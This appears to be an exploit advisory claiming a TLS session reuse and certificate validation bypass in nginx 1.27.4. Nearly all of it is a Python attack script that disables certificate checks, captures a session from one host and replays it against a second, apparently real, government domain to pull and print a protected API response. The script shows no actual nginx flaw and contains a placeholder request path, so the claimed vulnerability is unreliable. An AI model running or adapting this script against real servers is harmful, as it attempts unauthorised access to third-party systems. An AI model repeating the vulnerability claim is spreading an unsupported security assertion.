==================================================================================================================================
| # Title     : nginx 1.27.4 Insecure TLS Session Reuse and SSL Certificate Validation Bypass                                    |
| # Author    : indoushka                                                                                                        |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
| # Vendor    : https://nginx.org/                                                                                               |
==================================================================================================================================

[+] Summary    : reuse a TLS/SSL session obtained from one server when connecting to a different server while completely disabling certificate and hostname verification. 
                 The script establishes encrypted connections, captures a TLS session object, attempts session resumption on another host, and requests a protected API endpoint.

[+] POc        :  

#!/usr/bin/env python3

import ssl
import socket

def create_insecure_context():
    """Create an SSL context that does not verify the certificate"""
    context = ssl.create_default_context()
    context.check_hostname = False 
    context.verify_mode = ssl.CERT_NONE 
    return context

source_server = "target01.gov.dz"
target_server = "target02.dz"

print(f" Starting attack from {source_server} to {target_server}")
print("Preparing connection (without certificate verification)...")
ssl_context1 = create_insecure_context()
print(f" Connecting to {source_server}...")
conn1 = socket.create_connection((source_server, 443))
secure_conn1 = ssl_context1.wrap_socket(conn1, server_hostname=source_server)
print(" Stealing session...")
stolen_session = secure_conn1.session
secure_conn1.close()
print(f"Session obtained: {stolen_session}")
print(f"\n Attempting to enter {target_server} using the stolen session...")
conn2 = socket.create_connection((target_server, 443))
secure_conn2 = ssl_context1.wrap_socket(conn2, server_hostname=target_server, session=stolen_session)

print("Requesting secret configuration file...")
request = f"GET 'LINK API'  HTTP/1.1\r\nHost: {target_server}\r\nConnection: close\r\n\r\n"
secure_conn2.send(request.encode())

response = secure_conn2.recv(8000)
secure_conn2.close()

if b"200 OK" in response:
    print("\nAttack Succeeded! Entered the secret system!")
    print("\n" + "="*50)
    print("Leaked Data:")
    print("="*50)

    if b'\r\n\r\n' in response:
        body = response.split(b'\r\n\r\n', 1)[1]
        try:
            print(body.decode('utf-8', errors='ignore')[:1500])
        except:
            print(body[:1500])
else:
    print("\n Attack Failed")
    print(f"Server response: {response[:200]}")




Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================